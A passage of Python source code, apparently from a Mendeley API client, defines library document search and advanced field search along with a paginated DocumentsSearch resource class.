return DocumentsSearch(self.session, query=query, view=view, marker=marker)
def advanced_search(self, title=None, author=None, source=None, abstract=None, tag=None, type=None, min_year=None, max_year=None,
view=None, page=None):
"""
Executes an advanced search in the logged-in user's library, where individual fields can be searched on.
:param title: Title.
:param author: Author.
:param source: Source.
:param abstract: Abstract.
:param tag: Tag.
:param min_year: Minimum year for documents to return.
:param max_year: Maximum year for documents to return.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:return: a :class:`DocumentsSearch <mendeley.resources.documents.DocumentsSearch>` resource, from which results
can be retrieved.
"""
if self.group_id:
raise MendeleyException('Search is not available for group documents')
return DocumentsSearch(self.session, title=title, author=author, source=source, abstract=abstract,
tag=tag, type=None, min_year=min_year, max_year=max_year, view=view, page=page)
@staticmethod
def view_type(view):
return {
'all': UserAllDocument,
'bib': UserBibDocument,
'client': UserClientDocument,
'tags': UserTagsDocument,
'core': UserDocument,
}.get(view, UserDocument)
class DocumentsSearch(ListResource):
"""
Resource for accessing the results of a catalog search.
"""
def __init__(self, session, **kwargs):
self.session = session
self.params = kwargs
def list(self, page_size=None, **kwargs):
"""
Retrieves search results, as a paginated collection.
:param page_size: the number of search results to return on each page. Defaults to 20.
:return: a :class:`Page <mendeley.pagination.Page>` of
:class:`CatalogDocuments <mendeley.models.catalog.CatalogDocument>`.
"""
return super(DocumentsSearch, self).list(page_size, **kwargs)
def iter(self, page_size=None):
"""
Retrieves search results, as an iterator.
:param page_size: the number of search results to retrieve at a time. Defaults to 20.
:return: an iterator of :class:`CatalogDocuments <mendeley.models.catalog.CatalogDocument>`.
"""
return super(DocumentsSearch, self).iter(page_size)
def _obj_type(self, **kwargs):
return Documents.view_type(self.params['view'])
@property
def _url(self):
return add_query_params('/search/documents', self.params)
@property
def _session(self):
return self.session
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.